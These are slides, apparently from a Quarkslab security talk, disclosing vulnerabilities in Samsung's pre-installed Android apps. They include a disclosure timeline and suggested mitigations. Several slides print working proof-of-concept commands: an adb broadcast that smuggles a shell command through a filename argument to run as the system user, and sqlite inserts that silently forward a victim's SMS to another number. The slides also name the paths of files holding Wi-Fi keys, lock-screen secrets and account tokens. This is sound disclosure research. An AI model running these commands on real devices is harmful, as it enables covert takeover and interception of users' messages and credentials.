<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
PoC<br />
$ adb shell am broadcast -a com.<strong>and</strong>roid.sec.FTAT_DUMP<br />
--es FILENAME ’../../../../../dev/null;/system/b<strong>in</strong>/id > /sdcard/shellescape;#’<br />
Broadcast<strong>in</strong>g : Intent { act=com.<strong>and</strong>roid.sec.FTAT_DUMP (has extras) }<br />
Broadcast completed : result=0<br />
$ adb shell cat /sdcard/shellescape<br />
uid=1000(system) gid=1000(system) groups=1001(radio),1006(camera),<br />
1007(log),1015(sdcard_rw),1023(media_rw),1028(sdcard_r),2001(cache),<br />
3001(net_bt_adm<strong>in</strong>),3002(net_bt),3003(<strong>in</strong>et),3007(net_bw_acct)
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Inventory of the permissions obta<strong>in</strong>ed<br />
Inventory<br />
Comb<strong>in</strong>ation of all the permissions of sharedUserId=system<br />
<strong>applications</strong><br />
A total of 156 permissions<br />
Like <strong>and</strong>roid.permission.INSTALL_PACKAGE (pm <strong>in</strong>stall<br />
package.apk)<br />
Like access to mail accounts, SMS, <strong>in</strong>ternet, ...<br />
We can <strong>in</strong>ject code <strong>in</strong>side other <strong>applications</strong> (dalvik-cache)<br />
Sensitive <strong>in</strong>formations can be read<br />
Wifi keys: /data/misc/wifi/wpa supplicant.conf<br />
Password/p<strong>in</strong>code/pattern: guesture.key, password.key, ...<br />
Mail accounts <strong>and</strong> Google Account token:<br />
/data/system/user/X/accounts.db
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Objectives
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Plan<br />
1 Context <strong>and</strong> objectives<br />
2 <strong>Android</strong> <strong>in</strong>troduction<br />
3 <strong>Android</strong> <strong>security</strong> model<br />
4 Methodology<br />
5 Toward a backdoor without permission<br />
6 Post-exploitation<br />
Samsung MDM for fun <strong>and</strong> laz<strong>in</strong>ess<br />
I can haz your sms?<br />
7 Scope of the vulnerabilities
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Samsung MDM for fun <strong>and</strong> laz<strong>in</strong>ess<br />
The Samsung’s MDM : SAFE<br />
Discovery of SAFE<br />
SAmsung For Enterprise: A framework for Samsung models<br />
Expose an API for the commercial MDMs<br />
Used partly by SamsungDive<br />
Implemented partly <strong>in</strong> /system/framework/services.odex<br />
Study of the permission system<br />
Many modules : BrowserPolicy, DevicePolicy, ...<br />
Each module checks that the call<strong>in</strong>g application has the correct<br />
permission:<br />
One permission per module : <strong>and</strong>roid.permission.sec.MDM_XXX<br />
Enforcement via enforceXXXPermission()
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Samsung MDM for fun <strong>and</strong> laz<strong>in</strong>ess<br />
The Samsung’s MDM : SAFE<br />
Discovery of SAFE<br />
SAmsung For Enterprise: A framework for Samsung models<br />
Expose an API for the commercial MDMs<br />
Used partly by SamsungDive<br />
Implemented partly <strong>in</strong> /system/framework/services.odex<br />
Study of the permission system<br />
Many modules : BrowserPolicy, DevicePolicy, ...<br />
Each module checks that the call<strong>in</strong>g application has the correct<br />
permission:<br />
One permission per module : <strong>and</strong>roid.permission.sec.MDM_XXX<br />
Enforcement via enforceXXXPermission()<br />
SAFE : The god mode<br />
The framework doesn’t check the permission when the call<strong>in</strong>g application<br />
is system (UID = 1000)
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Samsung MDM for fun <strong>and</strong> laz<strong>in</strong>ess<br />
SAFE: The god mode<br />
MDM Usage without any restriction<br />
The features implemented (for us?):<br />
Application Policy - application backup, application un<strong>in</strong>stall, ...<br />
Mail Account Policy - Manage mail accounts, behaviour when<br />
SSL certificates are <strong>in</strong>valid, ...<br />
Enterprise VPN Policy - Retriev<strong>in</strong>g of the certificates, passwords,<br />
...<br />
Phone Restriction - Block WiFi, VPN connection, USB Debug,<br />
OTA firmware updates, reset to factory sett<strong>in</strong>gs, ...<br />
Misc Policy - Retrieve the clipboard content, ...<br />
We can ”<strong>in</strong>fect” someone <strong>and</strong> prevent him from receiv<strong>in</strong>g firmware<br />
updates that corrects vulnerabilities.
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I can haz your sms?<br />
SMS Forward<strong>in</strong>g<br />
DSMLawmo.apk<br />
Study of the <strong>applications</strong> listen<strong>in</strong>g for <strong>in</strong>comm<strong>in</strong>g SMS<br />
BroadcastReceiver listen<strong>in</strong>g for Intent with action<br />
<strong>and</strong>roid.provider.Telephony.SMS_RECEIVED<br />
DSMLawmo.apk seems to have an <strong>in</strong>terest<strong>in</strong>g functionality...<br />
[...]<br />
if ("<strong>and</strong>roid.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))<br />
{<br />
Util.Logd("Start to SMS forward<strong>in</strong>g service");<br />
[...]
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I can haz your sms?<br />
SMS Forward<strong>in</strong>g<br />
DSMSMSReceiver<br />
onReceive() of DSMSMSReceiver checks that:<br />
If a SMS just arrived <strong>and</strong> I have not received it recently<br />
If the SMS forward<strong>in</strong>g is enabled<br />
SMSForward<strong>in</strong>g key <strong>in</strong> the object DSMRepository<br />
If all these conditions are met, the smartphone forwards the SMS to<br />
the configured phone number<br />
Transparent to the user...<br />
DSMRepository<br />
DSMRepository query a ContentProvider:<br />
content://com.sec.dsm.system.dsmcontentprovider/dsm<br />
sqlite db -> /data/data/com.sec.dsm.system/databases/profile.db<br />
dsm table, column Key = SMSForward?
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I can haz your sms?<br />
SMS Forward<strong>in</strong>g<br />
PoC (Will not be patched, it’s a feature!)<br />
system@<strong>and</strong>roid:/data/data/com.sec.dsm.system/databases $ ls -al<br />
-rw-rw---- system system 16384 2013-01-18 22:18 profile.db<br />
system@<strong>and</strong>roid:/data/data/com.sec.dsm.system/databases $ sqlite3<br />
sqlite> <strong>in</strong>sert <strong>in</strong>to dsm values(null,"SMSForward<strong>in</strong>g","Enable");<br />
sqlite> <strong>in</strong>sert <strong>in</strong>to dsm values(null,"SMSRecipient","+33*NUMERO*");
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Plan<br />
1 Context <strong>and</strong> objectives<br />
2 <strong>Android</strong> <strong>in</strong>troduction<br />
3 <strong>Android</strong> <strong>security</strong> model<br />
4 Methodology<br />
5 Toward a backdoor without permission<br />
6 Post-exploitation<br />
7 Scope of the vulnerabilities<br />
8 Conclusion
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Scope of the vulnerabilities<br />
Model Release date V1 V2 V3 V4 V5<br />
Samsung Galaxy S2 05/2011 ̌ ̌ ̌ ̌ -<br />
Samsung Galaxy Tab 1 06/2011 N.A ̌ ̌ ̌ -<br />
Samsung Galaxy Note 1 11/2011 ̌ - ̌ - -<br />
Samsung Galaxy S3 05/2012 ̌ ̌ ̌ ̌ ̌<br />
Samsung Galaxy Tab 2 05/2012 N.A ̌ - ̌ ̌<br />
Samsung Galaxy Note 2 10/2012 - ̌ - ̌ ̌<br />
Samsung Galaxy S3 m<strong>in</strong>i 11/2012 - ̌ - ̌ ̌<br />
Samsung Galaxy S4 04/2013 - - - - -<br />
Numéro Description<br />
V1 SMS/MMS send<strong>in</strong>g <strong>and</strong> files exfiltration<br />
V2 Arbitrary HTTP requests execution<br />
V3 Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
V4 Sync <strong>and</strong> remote control for fun <strong>and</strong> profit<br />
V5 System app escape shell
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Plan<br />
1 Context <strong>and</strong> objectives<br />
2 <strong>Android</strong> <strong>in</strong>troduction<br />
3 <strong>Android</strong> <strong>security</strong> model<br />
4 Methodology<br />
5 Toward a backdoor without permission<br />
6 Post-exploitation<br />
7 Scope of the vulnerabilities<br />
8 Conclusion
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Conclusion<br />
Agenda<br />
03/26 - A dozen of vulnerabilities reported to Samsung<br />
04/18 - Samsung has f<strong>in</strong>ished to analyze our vulnerabilities<br />
06/06 - No patch is currently deployed on the Samsung models<br />
The vulnerabilities are patched <strong>in</strong> the <strong>Android</strong> 4.2.2 I9300 leaked<br />
ROM, the release date is scheduled for June
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Conclusion<br />
The vulnerabilities<br />
The vulnerabilities are easy to f<strong>in</strong>d <strong>and</strong> exploit<br />
It’s not only Samsung, we have seen similar vulnerabilities on other<br />
(all?) constructors...<br />
Often, only a permission on the right component is needed to<br />
prevent the vulnerability<br />
The Samsung frontend is bigger <strong>and</strong> bigger on each release,<br />
exp<strong>and</strong><strong>in</strong>g the attack surface...<br />
Google needs to do someth<strong>in</strong>g, because the constructors weaken the<br />
<strong>security</strong> of <strong>Android</strong>
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Conclusion<br />
Some solutions ?<br />
Antivirus? pretty useless on <strong>Android</strong> (only signature based?)<br />
Flash a custom ROM found on Internet <strong>and</strong> without the Samsung<br />
frontend?<br />
Do you trust the ROM creator?<br />
S<strong>in</strong>ce Jelly Bean, there is SEL<strong>in</strong>ux on <strong>Android</strong><br />
If correctly used, it can solve many problems<br />
But it’s hard for an enduser to configure it...<br />
Configuration must be done by the constructors, who need to do a<br />
good job here<br />
And when you saw their <strong>applications</strong>... not really confident about this<br />
Buy Nexus phones or the Samsung Galaxy S4 ”Google Edition”
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Thank you for your attention<br />
Questions?
contact@quarkslab.com I @quarkslab.com